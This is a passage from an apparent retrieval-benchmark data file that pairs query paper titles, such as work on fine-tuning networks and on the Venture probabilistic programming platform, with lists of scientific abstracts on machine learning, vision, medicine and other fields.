including the dental technician. Team members can identify and highlight discrepancies in soft or hard tissue morphology and discuss the best available solutions using the amplified images. Every team member can add information directly on the slides in writing or using voice-over, thus simplifying the process even more. All team members can access this information whenever necessary to review, alter, or add elements during the diagnostic and treatment phases. Digital Smile Design: A Tool for Treatment Planning and Communication in Esthetic Dentistry",
"title": ""
},
{
"docid": "a691214a7ac8a1a7b4ad6fe833afd572",
"text": "Within the field of computer vision, change detection algorithms aim at automatically detecting significant changes occurring in a scene by analyzing the sequence of frames in a video stream. In this paper we investigate how state-of-the-art change detection algorithms can be combined and used to create a more robust algorithm leveraging their individual peculiarities. We exploited genetic programming (GP) to automatically select the best algorithms, combine them in different ways, and perform the most suitable post-processing operations on the outputs of the algorithms. In particular, algorithms’ combination and post-processing operations are achieved with unary, binary and ${n}$ -ary functions embedded into the GP framework. Using different experimental settings for combining existing algorithms we obtained different GP solutions that we termed In Unity There Is Strength. These solutions are then compared against state-of-the-art change detection algorithms on the video sequences and ground truth annotations of the ChangeDetection.net 2014 challenge. Results demonstrate that using GP, our solutions are able to outperform all the considered single state-of-the-art change detection algorithms, as well as other combination strategies. The performance of our algorithm are significantly different from those of the other state-of-the-art algorithms. This fact is supported by the statistical significance analysis conducted with the Friedman test and Wilcoxon rank sum post-hoc tests.",
"title": ""
},
{
"docid": "09bb06388c9018c205c09406b360692b",
"text": "Detecting anomalies in large-scale, streaming datasets has wide applicability in a myriad of domains like network intrusion detection for cyber-security, fraud detection for credit cards, system health monitoring, and fault detection in safety critical systems. Due to its wide applicability, the problem of anomaly detection has been well-studied by industry and academia alike, and many algorithms have been proposed for detecting anomalies in different problem settings. But until recently, there was no openly available, systematic dataset and/or framework using which the proposed anomaly detection algorithms could be compared and evaluated on a common ground. Numenta Anomaly Benchmark (NAB), made available by Numenta1 in 2015, addressed this gap by providing a set of openly-available, labeled data files and a common scoring system, using which different anomaly detection algorithms could be fairly evaluated and compared. In this paper, we provide an in-depth analysis of the key aspects of the NAB framework, and highlight inherent challenges therein, with the objective to provide insights about the gaps in the current framework that must be addressed so as to make it more robust and easy-to-use. Furthermore, we also provide additional evaluation of five state-of-the-art anomaly detection algorithms (including the ones proposed by Numenta) using the NAB datasets, and based on the evaluation results, we argue that the performance of these algorithms is not sufficient for practical, industry-scale applications, and must be improved upon so as to make them suitable for large-scale anomaly detection problems.",
"title": ""
}
] | scidocsrr |
a71810c6891ec06d9a65fb34359eb41e | Growing a Brain: Fine-Tuning by Increasing Model Capacity | [
{
"docid": "01534202e7db5d9059651290e1720bf0",
"text": "The objective of this paper is the effective transfer of the Convolutional Neural Network (CNN) feature in image search and classification. Systematically, we study three facts in CNN transfer. 1) We demonstrate the advantage of using images with a properly large size as input to CNN instead of the conventionally resized one. 2) We benchmark the performance of different CNN layers improved by average/max pooling on the feature maps. Our observation suggests that the Conv5 feature yields very competitive accuracy under such pooling step. 3) We find that the simple combination of pooled features extracted across variou s CNN layers is effective in collecting evidences from both low and high level descriptors. Following these good practices, we are capable of improving the state of the art on a number of benchmarks to a large margin.",
"title": ""
}
] | [
{
"docid": "1dbb3a49f6c0904be9760f877b7270b7",
"text": "We propose a geographical visualization to support operators of coastal surveillance systems and decision making analysts to get insights in vessel movements. For a possibly unknown area, they want to know where significant maritime areas, like highways and anchoring zones, are located. We show these features as an overlay on a map. As source data we use AIS data: Many vessels are currently equipped with advanced GPS devices that frequently sample the state of the vessels and broadcast them. Our visualization is based on density fields that are derived from convolution of the dynamic vessel positions with a kernel. The density fields are shown as illuminated height maps. Combination of two fields, with a large and small kernel provides overview and detail. A large kernel provides an overview of area usage revealing vessel highways. Details of speed variations of individual vessels are shown with a small kernel, highlighting anchoring zones where multiple vessels stop. Besides for maritime applications we expect that this approach is useful for the visualization of moving object data in general.",
"title": ""
},
{
"docid": "e6da2d0e288a0eb9550c671a882e00c2",
"text": "BACKGROUND\nThe Brief COPE instrument has been utilized to conduct research on various populations, including people living with HIV (PLWH). However, the questionnaire constructs when applied to PLWH have not been subjected to thorough factor validation.\n\n\nMETHODS\nA total of 258 PLWH were recruited from two provinces of China. They answered questions involving the scales of three instruments: the Brief COPE, the Perceived Social Support Scale, and the Perceived Discrimination Scale for PLWH. Confirmatory factor analysis (CFA) and exploratory factor analysis (EFA) were conducted.\n\n\nRESULTS\nThe CFA found a poor goodness of fit to the data. The subsequent EFA identified six preliminary factors, forming subscales with Cronbach's alphas, which ranged from 0.61 to 0.80. Significant correlation coefficients between the subscales and measures of perceived social support and perceived discrimination were reported, giving preliminary support to the validity of the new empirical factor structure.\n\n\nCONCLUSION\nThis study showed that the original factor structure of the Brief COPE instrument, when applied to PLWH in China, did not fit the data. Thus, the Brief COPE should be applied to various populations and cultures with caution. The new factor structure established by the EFA is only preliminary and requires further validation.",
"title": ""
},
{
"docid": "b14748d454917414725bfa51c62730ad",
"text": "The authors investigated the lexical entry for morphologically complex words in English, Six experiments, using a cross-modal repetition priming task, asked whether the lexical entry for derivationally suffixed and prefixed words is morphologically structured and how this relates to the semantic and phonological transparency of the surface relationship between stem and affix. There was clear evidence for morphological decomposition of semantically transparent forms. This was independent of phonological transparency, suggesting that morphemic representations are phonologically abstract. Semantically opaque forms, in contrast, behave like monomorphemic words. Overall, suffixed and prefixed derived words and their stems prime each other through shared morphemes in the lexical entry, except for pairs of suffixed forms, which show a cohort-based interference effect.",
"title": ""
},
{
"docid": "5980e6111c145db3e1bfc5f47df7ceaf",
"text": "Traffic signs are characterized by a wide variability in their visual appearance in real-world environments. For example, changes of illumination, varying weather conditions and partial occlusions impact the perception of road signs. In practice, a large number of different sign classes needs to be recognized with very high accuracy. Traffic signs have been designed to be easily readable for humans, who perform very well at this task. For computer systems, however, classifying traffic signs still seems to pose a challenging pattern recognition problem. Both image processing and machine learning algorithms are continuously refined to improve on this task. But little systematic comparison of such systems exist. What is the status quo? Do today's algorithms reach human performance? For assessing the performance of state-of-the-art machine learning algorithms, we present a publicly available traffic sign dataset with more than 50,000 images of German road signs in 43 classes. The data was considered in the second stage of the German Traffic Sign Recognition Benchmark held at IJCNN 2011. The results of this competition are reported and the best-performing algorithms are briefly described. Convolutional neural networks (CNNs) showed particularly high classification accuracies in the competition. We measured the performance of human subjects on the same data-and the CNNs outperformed the human test persons.",
"title": ""
},
{
"docid": "984bf4f0500e737159b847eab2fa5021",
"text": "We present efmaral, a new system for efficient and accurate word alignment using a Bayesian model with Markov Chain Monte Carlo (MCMC) inference. Through careful selection of data structures and model architecture we are able to surpass the fast_align system, commonly used for performance-critical word alignment, both in computational efficiency and alignment accuracy. Our evaluation shows that a phrase-based statistical machine translation (SMT) system produces translations of higher quality when using word alignments from efmaral than from fast_align, and that translation quality is on par with what is obtained using giza++, a tool requiring orders of magnitude more processing time. More generally we hope to convince the reader that Monte Carlo sampling, rather than being viewed as a slow method of last resort, should actually be the method of choice for the SMT practitioner and others interested in word alignment.",
"title": ""
},
{
"docid": "32775ba6d1a26274eaa6ce92513d9850",
"text": "Data reduction plays an important role in machine learning and pattern recognition with a high-dimensional data. In real-world applications data usually exists with hybrid formats, and a unified data reducing technique for hybrid data is desirable. In this paper, an information measure is proposed to computing discernibility power of a crisp equivalence relation or a fuzzy one, which is the key concept in classical rough set model and fuzzy-rough set model. Based on the information measure, a general definition of significance of nominal, numeric and fuzzy attributes is presented. We redefine the independence of hybrid attribute subset, reduct, and relative reduct. Then two greedy reduction algorithms for unsupervised and supervised data dimensionality reduction based on the proposed information measure are constructed. Experiments show the reducts found by the proposed algorithms get a better performance compared with classical rough set approaches. 2005 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "9ccb958ef7740c0ccf62faaccf3344b8",
"text": "This paper describes the anatomy of the musculature crossing the lumbar spine in a standardized form to provide data generally suitable for static biomechanical analyses of muscle and spinal forces. The muscular anatomy from several sources was quantified and transformed to the mean bony anatomy of four young healthy adults measured from standing stereo-radiographs. The origins, insertions and physiological cross-sectional area (PCSA) of 180 muscle slips which act on the lumbar spine are given relative to the bony anatomy defined by the locations of 12 thoracic and five lumbar vertebrae, and the sacrum, and the shape and positions of the 24 ribs. The broad oblique abdominal muscles are each represented by six vectors and an appropriate proportion of the total PCSA was assigned to each to represent the muscle biomechanics.",
"title": ""
},
{
"docid": "37f55e03f4d1ff3b9311e537dc7122b5",
"text": "Extracting governing equations from data is a central challenge in many diverse areas of science and engineering. Data are abundant whereas models often remain elusive, as in climate science, neuroscience, ecology, finance, and epidemiology, to name only a few examples. In this work, we combine sparsity-promoting techniques and machine learning with nonlinear dynamical systems to discover governing equations from noisy measurement data. The only assumption about the structure of the model is that there are only a few important terms that govern the dynamics, so that the equations are sparse in the space of possible functions; this assumption holds for many physical systems in an appropriate basis. In particular, we use sparse regression to determine the fewest terms in the dynamic governing equations required to accurately represent the data. This results in parsimonious models that balance accuracy with model complexity to avoid overfitting. We demonstrate the algorithm on a wide range of problems, from simple canonical systems, including linear and nonlinear oscillators and the chaotic Lorenz system, to the fluid vortex shedding behind an obstacle. The fluid example illustrates the ability of this method to discover the underlying dynamics of a system that took experts in the community nearly 30 years to resolve. We also show that this method generalizes to parameterized systems and systems that are time-varying or have external forcing.",
"title": ""
},
{
"docid": "20353d24c6a5cea6461e09853a854375",
"text": "This paper proposes a deep bidirectional long short-term memory approach in modeling the long contextual, nonlinear mapping between audio and visual streams for video-realistic talking head. In training stage, an audio-visual stereo database is firstly recorded as a subject talking to a camera. The audio streams are converted into acoustic feature, i.e. Mel-Frequency Cepstrum Coefficients (MFCCs), and their textual labels are also extracted. The visual streams, in particular, the lower face region, are compactly represented by active appearance model (AAM) parameters by which the shape and texture variations can be jointly modeled. Given pairs of the audio and visual parameter sequence, a DBLSTM model is trained to learn the sequence mapping from audio to visual space. For any unseen speech audio, whether it is original recorded or synthesized by text-to-speech (TTS), the trained DBLSTM model can predict a convincing AAM parameter trajectory for the lower face animation. To further improve the realism of the proposed talking head, the trajectory tiling method is adopted to use the DBLSTM predicted AAM trajectory as a guide to select a smooth real sample image sequence from the recorded database. We then stitch the selected lower face image sequence back to a background face video of the same subject, resulting in a video-realistic talking head. Experimental results show that the proposed DBLSTM approach outperforms the existing HMM-based approach in both objective and subjective evaluations.",
"title": ""
},
{
"docid": "98465c0b863fd7eb07e7ba2596fb5dee",
"text": "In this paper, multimodal Deep Boltzmann Machines (DBM) is employed to learn important genes (biomarkers) on gene expression data from human carcinoma colorectal. The learning process involves gene expression data and several patient phenotypes such as lymph node and distant metastasis occurrence. The proposed framework in this paper uses multimodal DBM to train records with metastasis occurrence. Later, the trained model is tested using records with no metastasis occurrence. After that, Mean Squared Error (MSE) is measured from the reconstructed and the original gene expression data. Genes are ranked based on the MSE value. The first gene has the highest MSE value. After that, k-means clustering is performed using various number of genes. Features that give the highest purity index are considered as the important genes. The important genes obtained from the proposed framework and two sample t-test are being compared. From the accuracy of metastasis classification, the proposed framework gives higher results compared to the top genes from two sample t-test.",
"title": ""
},
{
"docid": "5d550089b4b4e09a8845695316eab7c6",
"text": "Objective: The aim of this study was to determine functional status and QoL of children with spina bifida (SB) by using the Functional Independence Measure for Children (WeeFIM) and the Child Health Questionnaire PF-50 (CHQPF-50) and to compare the functional status data of pediatric SB patients with those of healthy children. Material and Methods: Forty children with SB and 40 healthy children aged between 36 and 143 months were enrolled in the study. Both pediatric SB patients and healthy children were divided into three age groups: Group 1: 36-71 months, Group 2: 72-107 months, and Group 3: 108-143 months. The WeeFIM and CHQPF-50 were completed for children with SB, whereas the WeeFIM was completed only for healthy children. Results: In both assessments, the total score and subscale scores were lower than normal values in children with SB. However, improvement was found in self-care; communication; social, emotional, and mental status; and family factors with increasing age. On the other hand, there was no improvement in physical score, transfer, mobility, and sphincter control with increasing age. Functional status of children with SB was significantly lower compared to healthy children. Conclusion: There was progress in self-care, communication, family factors, and social, emotional and mental status in children with SB with increasing age.",
"title": ""
},
{
"docid": "bcfc8566cf73ec7c002dcca671e3a0bd",
"text": "of the thoracic spine revealed a 1.1 cm intradural extramedullary mass at the level of the T2 vertebral body (Figure 1a). Spinal neurosurgery was planned due to exacerbation of her chronic back pain and progressive weakness of the lower limbs at 28 weeks ’ gestation. Emergent spinal decompression surgery was performed with gross total excision of the tumour. Doppler fl ow of the umbilical artery was used preoperatively and postoperatively to monitor fetal wellbeing. Th e histological examination revealed HPC, World Health Organization (WHO) grade 2 (Figure 1b). Complete recovery was seen within 1 week of surgery. Follow-up MRI demonstrated complete removal of the tumour. We recommended adjuvant external radiotherapy to the patient in the 3rd trimester of pregnancy due to HPC ’ s high risk of recurrence. However, the patient declined radiotherapy. Routine weekly obstetric assessments were performed following surgery. At the 37th gestational week, a 2,850 g, Apgar score 7 – 8, healthy infant was delivered by caesarean section, without need of admission to the neonatal intensive care unit. Adjuvant radiotherapy was administered to the patient in the postpartum period.",
"title": ""
},
{
"docid": "c7d629a83de44e17a134a785795e26d8",
"text": "How can firms profitably give away free products? This paper provides a novel answer and articulates tradeoffs in a space of information product design. We introduce a formal model of two-sided network externalities based in textbook economics—a mix of Katz & Shapiro network effects, price discrimination, and product differentiation. Externality-based complements, however, exploit a different mechanism than either tying or lock-in even as they help to explain many recent strategies such as those of firms selling operating systems, Internet browsers, games, music, and video. The model presented here argues for three simple but useful results. First, even in the absence of competition, a firm can rationally invest in a product it intends to give away into perpetuity. Second, we identify distinct markets for content providers and end consumers and show that either can be a candidate for a free good. Third, product coupling across markets can increase consumer welfare even as it increases firm profits. The model also generates testable hypotheses on the size and direction of network effects while offering insights to regulators seeking to apply antitrust law to network markets. ACKNOWLEDGMENTS: We are grateful to participants of the 1999 Workshop on Information Systems and Economics, the 2000 Association for Computing Machinery SIG E-Commerce, the 2000 International Conference on Information Systems, the 2002 Stanford Institute for Theoretical Economics (SITE) workshop on Internet Economics, the 2003 Insitut D’Economie Industrielle second conference on “The Economics of the Software and Internet Industries,” as well as numerous participants at university seminars. We wish to thank Tom Noe for helpful observations on oligopoly markets, Lones Smith, Kai-Uwe Kuhn, and Jovan Grahovac for corrections and model generalizations, Jeff MacKie-Mason for valuable feedback on model design and bundling, and Hal Varian for helpful comments on firm strategy and model implications. Frank Fisher provided helpful advice on and knowledge of the Microsoft trial. Jean Tirole provided useful suggestions and examples, particularly in regard to credit card markets. Paul Resnick proposed the descriptive term “internetwork” externality to describe two-sided network externalities. Tom Eisenmann provided useful feedback and examples. We also thank Robert Gazzale, Moti Levi, and Craig Newmark for their many helpful observations. This research has been supported by NSF Career Award #IIS 9876233. For an earlier version of the paper that also addresses bundling and competition, please see “Information Complements, Substitutes, and Strategic Product Design,” November 2000, http://ssrn.com/abstract=249585.",
"title": ""
},
{
"docid": "ecda1d7fb7e05f6d7c63e38fb8f424b8",
"text": "Auto dynamic difficulty (ADD) is the technique of automatically changing the level of difficulty of a video game in real time to match player expertise. Recreating an ADD system on a game-by-game basis is both expensive and time consuming, ultimately limiting its usefulness. Thus, we leverage the benefits of software design patterns to construct an ADD framework. In this paper, we discuss a number of desirable software quality attributes that can be achieved through the usage of these design patterns, based on a case study of two video games.",
"title": ""
},
{
"docid": "61df2a452626b80ce815a0b9528a580b",
"text": "The nice guy stereotype asserts that, although women often say that they wish to date kind, sensitive men, when actually given a choice, women will reject nice men in favor of men with other salient characteristics, such as physical attractiveness. To explore this stereotype, two studies were conducted. In Study 1, 48 college women were randomly assigned into experimental conditions in which they read a script that depicted 2 men competing for a date with a woman. The niceness of 1 target man’s responses was manipulated across conditions. In Study 2, 194 college women were randomly assigned to conditions in which both the target man’s responses and his physical attractiveness were manipulated. Overall results indicated that both niceness and physical attractiveness were positive factors in women’s choices and desirability ratings of the target men. Niceness appeared to be the most salient factor when it came to desirability for more serious relationships, whereas physical attractiveness appeared more important in terms of desirability for more casual, sexual relationships.",
"title": ""
},
{
"docid": "5dcf33299ebbf8b1de1a8e162a7859c1",
"text": "Firstly, olfactory association learning was used to determine the modulating effect of 5-HT4 receptor involvement in learning and long-term memory. Secondly, the effects of systemic injections of a 5-HT4 partial agonist and an antagonist on long-term potentiation (LTP) and depotentiation in the dentate gyrus (DG) were tested in freely moving rats. The modulating role of the 5-HT4 receptors was studied by using a potent, 5-HT4 partial agonist RS 67333 [1-(4-amino-5-chloro-2-methoxyphenyl)-3-(1-n-butyl-4-piperidinyl)-1-propanone] and a selective 5-HT4 receptor antagonist RS 67532 [1-(4-amino-5-chloro-2-(3,5-dimethoxybenzyloxyphenyl)-5-(1-piperidinyl)-1-propanone]. Agonist or antagonist systemic chronic injections prior to five training sessions yielded a facilitatory effect on procedural memory during the first session only with the antagonist. Systemic injection of the antagonist only before the first training session improved procedural memory during the first session and associative memory during the second session. Similar injection with the 5-HT4 partial agonist had an opposite effect. The systemic injection of the 5-HT4 partial agonist prior to the induction of LTP in the dentate gyrus by high-frequency stimulation was followed by a population spike increase, while the systemic injection of the antagonist accelerated the depotentiation 48 h later. The behavioural and physiological results pointed out the involvement of 5-HT4 receptors in processing related to the long-term hippocampal-dependent memory system, and suggest that specific 5-HT4 agonists could be used to treat amnesic patients with a dysfunction in this particular system.",
"title": ""
},
{
"docid": "609faa087f4815eb13ee99736d793024",
"text": "This paper presents an approach to develop motorway Rear-End Crash Risk Identification Models (RECRIM) using disaggregate traffic data, meteorological data and crash database for a study site at a two-lane-per-direction section on Swiss (right-hand driving) motorway A1. Traffic data collected from inductive double loop detectors provide instant vehicle information such as speed, time headway, etc. We define traffic situations (TS) characterized by 22 variables representing traffic status for 5-minute intervals. Our goal is to develop models that can separate TS under non-crash conditions and TS under pre-crash conditions using Random Forest - an ensemble learning method. Non-crash TS were clustered into groups that we call traffic regimes (TR). Precrash TS are classified into TR so that a RECRIM for each TR is developed. Interpreting results of the models suggests that speed variance on the right lane and speed difference between two lanes are the two main causes of the rear-end crashes. The applicability of RECRIM in a real-time framework is also discussed.",
"title": ""
},
{
"docid": "75a1832a5fdd9c48f565eb17e8477b4b",
"text": "We introduce a new interactive system: a game that is fun and can be used to create valuable output. When people play the game they help determine the contents of images by providing meaningful labels for them. If the game is played as much as popular online games, we estimate that most images on the Web can be labeled in a few months. Having proper labels associated with each image on the Web would allow for more accurate image search, improve the accessibility of sites (by providing descriptions of images to visually impaired individuals), and help users block inappropriate images. Our system makes a significant contribution because of its valuable output and because of the way it addresses the image-labeling problem. Rather than using computer vision techniques, which don't work well enough, we encourage people to do the work by taking advantage of their desire to be entertained.",
"title": ""
},
{
"docid": "7f511850dd3a61fec404e817f9005792",
"text": "AIMS\nTo assess disordered online social networking use via modified diagnostic criteria for substance dependence, and to examine its association with difficulties with emotion regulation and substance use.\n\n\nDESIGN\nCross-sectional survey study targeting undergraduate students. Associations between disordered online social networking use, internet addiction, deficits in emotion regulation and alcohol use problems were examined using univariate and multivariate analyses of covariance.\n\n\nSETTING\nA large University in the Northeastern United States.\n\n\nPARTICIPANTS\nUndergraduate students (n = 253, 62.8% female, 60.9% white, age mean = 19.68, standard deviation = 2.85), largely representative of the target population. The response rate was 100%.\n\n\nMEASUREMENTS\nDisordered online social networking use, determined via modified measures of alcohol abuse and dependence, including DSM-IV-TR diagnostic criteria for alcohol dependence, the Penn Alcohol Craving Scale and the Cut-down, Annoyed, Guilt, Eye-opener (CAGE) screen, along with the Young Internet Addiction Test, Alcohol Use Disorders Identification Test, Acceptance and Action Questionnaire-II, White Bear Suppression Inventory and Difficulties in Emotion Regulation Scale.\n\n\nFINDINGS\nDisordered online social networking use was present in 9.7% [n = 23; 95% confidence interval (5.9, 13.4)] of the sample surveyed, and significantly and positively associated with scores on the Young Internet Addiction Test (P < 0.001), greater difficulties with emotion regulation (P = 0.003) and problem drinking (P = 0.03).\n\n\nCONCLUSIONS\nThe use of online social networking sites is potentially addictive. Modified measures of substance abuse and dependence are suitable in assessing disordered online social networking use. Disordered online social networking use seems to arise as part of a cluster of symptoms of poor emotion regulation skills and heightened susceptibility to both substance and non-substance addiction.",
"title": ""
},
{
"docid": "0b6846c4dd89be21af70b144c93f7a7b",
"text": "Most existing collaborative filtering models only consider the use of user feedback (e.g., ratings) and meta data (e.g., content, demographics). However, in most real world recommender systems, context information, such as time and social networks, are also very important factors that could be considered in order to produce more accurate recommendations. In this work, we address several challenges for the context aware movie recommendation tasks in CAMRa 2010: (1) how to combine multiple heterogeneous forms of user feedback? (2) how to cope with dynamic user and item characteristics? (3) how to capture and utilize social connections among users? For the first challenge, we propose a novel ranking based matrix factorization model to aggregate explicit and implicit user feedback. For the second challenge, we extend this model to a sequential matrix factorization model to enable time-aware parametrization. Finally, we introduce a network regularization function to constrain user parameters based on social connections. To the best of our knowledge, this is the first study that investigates the collective modeling of social and temporal dynamics. Experiments on the CAMRa 2010 dataset demonstrated clear improvements over many baselines.",
"title": ""
}
] | scidocsrr |
55c8b0ac0a3388e0d1169a78fa0241e6 | Venture: a higher-order probabilistic programming platform with programmable inference | [
{
"docid": "0de84142c51e72dd907804ef518195d8",
"text": "Markov chain Monte Carlo and sequential Monte Carlo methods have emerged as the two main tools to sample from high dimensional probability distributions.Although asymptotic convergence of Markov chain Monte Carlo algorithms is ensured under weak assumptions, the performance of these algorithms is unreliable when the proposal distributions that are used to explore the space are poorly chosen and/or if highly correlated variables are updated independently. We show here how it is possible to build efficient high dimensional proposal distributions by using sequential Monte Carlo methods. This allows us not only to improve over standard Markov chain Monte Carlo schemes but also to make Bayesian inference feasible for a large class of statistical models where this was not previously so. We demonstrate these algorithms on a non-linear state space model and a Lévy-driven stochastic volatility model.",
"title": ""
},
{
"docid": "351562a44f9126db2f48e2760e26af4e",
"text": "It has been widely observed that there is no single “dominant” SAT solver; instead, different solvers perform best on different instances. Rather than following the traditional approach of choosing the best solver for a given class of instances, we advocate making this decision online on a per-instance basis. Building on previous work, we describe SATzilla, an automated approach for constructing per-instance algorithm portfolios for SAT that use socalled empirical hardness models to choose among their constituent solvers. This approach takes as input a distribution of problem instances and a set of component solvers, and constructs a portfolio optimizing a given objective function (such as mean runtime, percent of instances solved, or score in a competition). The excellent performance of SATzilla was independently verified in the 2007 SAT Competition, where our SATzilla07 solvers won three gold, one silver and one bronze medal. In this article, we go well beyond SATzilla07 by making the portfolio construction scalable and completely automated, and improving it by integrating local search solvers as candidate solvers, by predicting performance score instead of runtime, and by using hierarchical hardness models that take into account different types of SAT instances. We demonstrate the effectiveness of these new techniques in extensive experimental results on data sets including instances from the most recent SAT competition.",
"title": ""
},
{
"docid": "02ed562cb1a532f937a8590226bb44dc",
"text": "We present a new algorithm for approximate inference in prob abilistic programs, based on a stochastic gradient for variational programs. Th is method is efficient without restrictions on the probabilistic program; it is pa rticularly practical for distributions which are not analytically tractable, inclu ding highly structured distributions that arise in probabilistic programs. We show ho w t automatically derive mean-field probabilistic programs and optimize them , and demonstrate that our perspective improves inference efficiency over other al gorithms.",
"title": ""
}
] | [
{
"docid": "56c75286b03f3a643ef0ade81edd9254",
"text": "The data saturation problem in Landsat imagery is well recognized and is regarded as an important factor resulting in inaccurate forest aboveground biomass (AGB) estimation. However, no study has examined the saturation values for different vegetation types such as coniferous and broadleaf forests. The objective of this study is to estimate the saturation values in Landsat imagery for different vegetation types in a subtropical region and to explore approaches to improving forest AGB estimation. Landsat Thematic Mapper imagery, digital elevation model data, and field measurements in Zhejiang province of Eastern China were used. Correlation analysis and scatterplots were first used to examine specific spectral bands and their relationships with AGB. A spherical model was then used to quantitatively estimate the saturation value of AGB for each vegetation type. A stratification of vegetation types and/or slope aspects was used to determine the potential to improve AGB estimation performance by developing a specific AGB estimation model for each category. Stepwise regression analysis based on Landsat spectral signatures and textures using grey-level co-occurrence matrix (GLCM) was used to develop AGB estimation models for different scenarios: non-stratification, stratification based on either vegetation types, slope aspects, or the combination of vegetation types and slope aspects. The results indicate that pine forest and mixed forest have the highest AGB saturation values (159 and 152 Mg/ha, respectively), Chinese fir and broadleaf forest have lower saturation values (143 and 123 Mg/ha, respectively), and bamboo forest and shrub have the lowest saturation values (75 and 55 Mg/ha, respectively). The stratification based on either vegetation types or slope aspects provided smaller root mean squared errors (RMSEs) than non-stratification. The AGB estimation models based on stratification of both vegetation types and slope aspects provided the most accurate estimation with the smallest RMSE of 24.5 Mg/ha. Relatively low AGB (e.g., less than 40 Mg/ha) sites resulted in overestimation and higher AGB (e.g., greater than 140 Mg/ha) sites resulted in underestimation. The smallest RMSE was obtained when AGB was 80–120 Mg/ha. This research indicates the importance of stratification in mitigating the data saturation problem, thus improving AGB estimation.",
"title": ""
},
{
"docid": "7e1b4fe1dcc7386edfd7e1ac17661ced",
"text": "Means and standard deviations are reported for the State-Trait Anxiety Inventory and the Zung Self-Rating Depression scale, collected during the course of a general health survey. Data for different age samples and for both sexes are presented for use in the evaluation of the significance of anxiety and depression levels in patients presenting with these symptoms. High estimates of reliability based on internal consistency statistics were found for all scales. Females scored more highly on both the measures and scores were inversely correlated with age, indicating the importance of specific and appropriate norms in assessing affective states.",
"title": ""
},
{
"docid": "f8e3b21fd5481137a80063e04e9b5488",
"text": "On the basis of the notion that the ability to exert self-control is critical to the regulation of aggressive behaviors, we suggest that mindfulness, an aspect of the self-control process, plays a key role in curbing workplace aggression. In particular, we note the conceptual and empirical distinctions between dimensions of mindfulness (i.e., mindful awareness and mindful acceptance) and investigate their respective abilities to regulate workplace aggression. In an experimental study (Study 1), a multiwave field study (Study 2a), and a daily diary study (Study 2b), we established that the awareness dimension, rather than the acceptance dimension, of mindfulness plays a more critical role in attenuating the association between hostility and aggression. In a second multiwave field study (Study 3), we found that mindful awareness moderates the association between hostility and aggression by reducing the extent to which individuals use dysfunctional emotion regulation strategies (i.e., surface acting), rather than by reducing the extent to which individuals engage in dysfunctional thought processes (i.e., rumination). The findings are discussed in terms of the implications of differentiating the dimensions and mechanisms of mindfulness for regulating workplace aggression. (PsycINFO Database Record",
"title": ""
},
{
"docid": "91382399e6341aed45a00b8fa3203005",
"text": "This paper presents a circularly polarized antenna on thin and flexible Denim substrate for Industrial, Scientific and Medical (ISM) band and Wireless Body Area Network (WBAN) applications at 2.45 GHz. Copper tape is used as the conductive material on 1 mm thick Denim substrate. Circular polarization is achieved by introducing rectangular slot along diagonal axes at the center of the circular patch radiator. Bandwidth enhancement is done using partial and slotted ground plane. The measured impedance bandwidth of the proposed antenna is 6.4 % (2.42 GHz to 2.58 GHz) or 160 MHz. The antenna exhibits good radiation characteristics with gain of 2.25 dB. Simulated and measured results are presented to validate the operability of antenna within the proposed frequency bands.",
"title": ""
},
{
"docid": "c51462988ce97a93da02e00af075127b",
"text": "By using mirror reflections of a scene, stereo images can be captured with a single camera (catadioptric stereo). In addition to simplifying data acquisition single camera stereo provides both geometric and radiometric advantages over traditional two camera stereo. In this paper, we discuss the geometry and calibration of catadioptric stereo with two planar mirrors. In particular, we will show that the relative orientation of a catadioptric stereo rig is restricted to the class of planar motions thus reducing the number of external calibration parameters from 6 to 5. Next we derive the epipolar geometry for catadioptric stereo and show that it has 6 degrees of freedom rather than 7 for traditional stereo. Furthermore, we show how focal length can be recovered from a single catadioptric image solely from a set of stereo correspondences. To test the accuracy of the calibration we present a comparison to Tsai camera calibration and we measure the quality of Euclidean reconstruction. In addition, we will describe a real-time system which demonstrates the viability of stereo with mirrors as an alternative to traditional two camera stereo.",
"title": ""
},
{
"docid": "146d5e7a8079a0b5171d9bc2813f3052",
"text": "The Shape Boltzmann Machine (SBM) [1] has recently been introduced as a stateof-the-art model of foreground/background object shape. We extend the SBM to account for the foreground object’s parts. Our new model, the Multinomial SBM (MSBM), can capture both local and global statistics of part shapes accurately. We combine the MSBM with an appearance model to form a fully generative model of images of objects. Parts-based object segmentations are obtained simply by performing probabilistic inference in the model. We apply the model to two challenging datasets which exhibit significant shape and appearance variability, and find that it obtains results that are comparable to the state-of-the-art. There has been significant focus in computer vision on object recognition and detection e.g. [2], but a strong desire remains to obtain richer descriptions of objects than just their bounding boxes. One such description is a parts-based object segmentation, in which an image is partitioned into multiple sets of pixels, each belonging to either a part of the object of interest, or its background. The significance of parts in computer vision has been recognized since the earliest days of the field (e.g. [3, 4, 5]), and there exists a rich history of work on probabilistic models for parts-based segmentation e.g. [6, 7]. Many such models only consider local neighborhood statistics, however several models have recently been proposed that aim to increase the accuracy of segmentations by also incorporating prior knowledge about the foreground object’s shape [8, 9, 10, 11]. In such cases, probabilistic techniques often mainly differ in how accurately they represent and learn about the variability exhibited by the shapes of the object’s parts. Accurate models of the shapes and appearances of parts can be necessary to perform inference in datasets that exhibit large amounts of variability. In general, the stronger the models of these two components, the more performance is improved. A generative model has the added benefit of being able to generate samples, which allows us to visually inspect the quality of its understanding of the data and the problem. Recently, a generative probabilistic model known as the Shape Boltzmann Machine (SBM) has been used to model binary object shapes [1]. The SBM has been shown to constitute the state-of-the-art and it possesses several highly desirable characteristics: samples from the model look realistic, and it generalizes to generate samples that differ from the limited number of examples it is trained on. The main contributions of this paper are as follows: 1) In order to account for object parts we extend the SBM to use multinomial visible units instead of binary ones, resulting in the Multinomial Shape Boltzmann Machine (MSBM), and we demonstrate that the MSBM constitutes a strong model of parts-based object shape. 2) We combine the MSBM with an appearance model to form a fully generative model of images of objects (see Fig. 1). We show how parts-based object segmentations can be obtained simply by performing probabilistic inference in the model. We apply our model to two challenging datasets and find that in addition to being principled and fully generative, the model’s performance is comparable to the state-of-the-art.",
"title": ""
},
{
"docid": "a917a0ed4f9082766aeef29cb82eeb27",
